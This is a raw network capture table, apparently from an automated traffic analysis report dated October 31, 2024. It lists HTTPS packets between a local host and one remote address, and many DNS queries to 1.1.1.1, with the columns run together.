                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.750778913 CET51520443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.750801086 CET4435152013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.750813961 CET51520443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.750819921 CET4435152013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.796027899 CET4435152113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.796523094 CET51521443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.796550035 CET4435152113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.796991110 CET51521443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.796998024 CET4435152113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.928909063 CET4435152113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.928980112 CET4435152113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.929110050 CET51521443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.929337025 CET51521443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.929352999 CET4435152113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.929364920 CET51521443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:52.929371119 CET4435152113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:53.040751934 CET4435152213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:53.041299105 CET51522443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:53.041331053 CET4435152213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:53.041862965 CET51522443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:53.041871071 CET4435152213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:53.176641941 CET4435152213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:53.177362919 CET4435152213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:53.177433968 CET51522443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:53.179965973 CET51522443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:53.179991007 CET4435152213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:53.180002928 CET51522443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:53.180010080 CET4435152213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:53.382334948 CET4435152313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:53.382843018 CET51523443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:53.382858038 CET4435152313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:53.383351088 CET51523443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:53.383358002 CET4435152313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:53.512949944 CET4435152313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:53.513093948 CET4435152313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:53.513153076 CET51523443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:53.513319016 CET51523443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:53.513329983 CET4435152313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:53.513340950 CET51523443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:53.513345957 CET4435152313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:17.580025911 CET6458953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:17.580267906 CET6409753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:17.621695042 CET53645891.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:17.808095932 CET53640971.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:17.873091936 CET53544801.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:18.649210930 CET5765153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:18.649547100 CET6419153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:18.685487986 CET53641911.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:18.714517117 CET53576511.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:19.301788092 CET53562951.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.427733898 CET5027853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.427917004 CET6148653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.671129942 CET53614861.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:21.671149969 CET53502781.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.106627941 CET6118953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.107126951 CET6302853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.107896090 CET6392853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.108364105 CET4974653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.108922005 CET5188053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.109488010 CET5851153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.111974955 CET53536171.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.113415956 CET53611891.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.114166975 CET53630281.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.114619017 CET53639281.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.114789009 CET53497461.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.116142988 CET53585111.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:22.315243959 CET138138192.168.2.4192.168.2.255
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:23.291361094 CET5260353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:23.291982889 CET5947853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:23.304461956 CET6474653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:23.304599047 CET5863453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:23.309288025 CET53618061.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:23.311299086 CET53586341.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:23.311322927 CET53647461.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.012743950 CET5568053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.013465881 CET5531653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.020520926 CET53556801.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.020546913 CET53553161.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.060787916 CET6231353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.061096907 CET5361153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.067806005 CET53623131.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:24.067866087 CET53536111.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.116739035 CET53590091.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.486825943 CET5116253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.486972094 CET5543653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.488500118 CET5690353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.488646984 CET5316853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.489399910 CET5702553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.489571095 CET6057953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.490055084 CET4962453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.490184069 CET5775853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.493745089 CET53511621.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.493757963 CET53554361.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.496603012 CET53570251.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.496881962 CET53605791.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.496891975 CET53496241.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.497433901 CET53577581.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.497450113 CET53531681.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.952150106 CET6277653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.952378035 CET5126453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:25.959090948 CET53568531.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:26.383169889 CET53504871.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.895286083 CET6039153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:27.895876884 CET6417253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.135073900 CET53603911.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.135421038 CET53641721.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.237696886 CET6491753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.237880945 CET5269053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.269366980 CET53526901.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.297065020 CET53649171.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.307513952 CET5671653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.307661057 CET6439753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.314549923 CET53643971.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.318711042 CET53567161.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.325536013 CET4950153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.325750113 CET5534953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.326827049 CET5626053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.326971054 CET5059453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.328980923 CET5846853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.329194069 CET5896753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.333117008 CET53553491.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.333621025 CET53562601.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.334065914 CET53505941.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.335952997 CET53584681.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:28.336941004 CET53589671.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:31.729172945 CET53630911.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:31.777069092 CET6011553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:31.777209044 CET6150253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:31.784216881 CET53601151.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:31.784625053 CET53615021.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.217365026 CET6240353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.217519045 CET6409753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.218015909 CET6022853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.218323946 CET5105253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.218797922 CET6357453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.218923092 CET5578153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.219387054 CET6436753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.219748020 CET6203753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.220428944 CET6525553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.220576048 CET5335053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.220983982 CET6316653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.222795963 CET5663853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.223330975 CET5670953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.223834038 CET6314553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.224870920 CET6042453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.225244045 CET53602281.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.225284100 CET6000853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.225406885 CET53640971.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.226049900 CET53635741.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.226062059 CET53510521.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.226156950 CET53624031.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.226167917 CET53557811.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.226528883 CET53643671.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.227025986 CET53620371.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.228221893 CET53631661.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.228341103 CET53652551.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.230050087 CET53533501.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.230096102 CET53566381.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.232635975 CET53604241.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.233340025 CET53600081.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.350243092 CET5660453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.350389957 CET5114553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.350862980 CET6241753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.351027966 CET6471153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.351450920 CET5515153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.351577044 CET5341953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.352125883 CET5822253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.352399111 CET5593153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.353221893 CET6299953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.353646040 CET6139553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.354623079 CET5402753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.354747057 CET6233553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.358098984 CET53511451.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.358122110 CET53647111.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.359174967 CET53582221.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.360515118 CET53629991.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.360532045 CET53559311.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.361051083 CET53613951.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.362588882 CET53623351.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:33.365166903 CET53540271.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.320527077 CET53596531.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.425930977 CET5863353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.426455975 CET5571053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.426795959 CET5527053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.427050114 CET5829653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.431770086 CET5720953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.431996107 CET5770553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.437880993 CET53586331.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.437897921 CET53557101.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.437947035 CET5157953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.438236952 CET5155753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.438437939 CET53552701.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.438450098 CET53582961.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.440098047 CET53577051.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.440330029 CET53572091.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.446141005 CET53515571.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.449698925 CET53515791.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.534204960 CET5180153192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.534476042 CET6490953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.542999029 CET5693353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.543137074 CET6408353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.563009977 CET53649091.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.563087940 CET53518011.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.566597939 CET53640831.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:34.566612959 CET53569331.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.816457033 CET5602953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.816703081 CET5015553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.824080944 CET53560291.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:35.824124098 CET53501551.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:36.497657061 CET53625131.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.642309904 CET6181553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.642309904 CET5110753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.649017096 CET53511071.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:38.649161100 CET53618151.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:39.304431915 CET53493891.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:39.715224981 CET5849753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:39.715365887 CET6379053192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.026063919 CET5563253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.026256084 CET5552653192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.027798891 CET5469553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.028063059 CET5907353192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.095069885 CET5781753192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.095362902 CET6029453192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.145904064 CET53637901.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.145953894 CET53584971.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.154077053 CET53590731.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.154146910 CET53555261.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.154397964 CET53546951.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.155164957 CET53556321.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.155177116 CET53578171.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.155858040 CET53602941.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.175508976 CET5605853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.175642014 CET5882853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.182312965 CET53560581.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.182795048 CET53588281.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:40.550746918 CET53588861.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:41.150079012 CET5011553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:41.150293112 CET5550953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:41.365277052 CET53501151.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:41.365289927 CET53555091.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:41.760759115 CET5347853192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:41.763109922 CET6384553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:41.771852016 CET53534781.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:41.772862911 CET53638451.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:45.170942068 CET5280553192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:45.171152115 CET5836253192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:45.178037882 CET53583621.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:45.178270102 CET53528051.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:54.957349062 CET6321953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:54.964523077 CET53632191.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:56.110932112 CET6380953192.168.2.41.1.1.1
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:19:56.119106054 CET53638091.1.1.1192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:17.403393030 CET53572591.1.1.1192.168.2.4
